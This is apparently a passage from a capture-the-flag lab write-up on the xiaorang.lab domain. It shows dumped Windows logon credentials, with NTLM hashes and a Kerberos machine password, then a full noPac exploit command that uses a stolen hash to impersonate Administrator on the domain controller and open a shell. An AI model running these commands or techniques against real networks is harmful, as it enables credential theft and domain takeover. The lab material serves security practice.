* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XR-LCM3AE8B$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/16 16:25:19
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-lcm3ae8b$
* Domain : XIAORANG.LAB
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 30318 (00000000:0000766e)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/10/16 16:25:19
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 30259 (00000000:00007633)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/10/16 16:25:19
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 29311 (00000000:0000727f)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/10/16 16:25:19
SID :
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XR-LCM3AE8B$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/16 16:25:19
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-lcm3ae8b$
* Domain : XIAORANG.LAB
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
得到账户
xiaorang.lab/zhanghui:1232126b24cdf8c9bd2f788a9d7c7ed1
XR-LCM3AE8B$:fa95d924926bcc02e177c18dedc74a7c
根据题目描述考虑 noPac
只有zhanghui能成功,zhanghui在MA_Admin组,MA_Admin 组对computer 能够创建对象
proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
得到flag04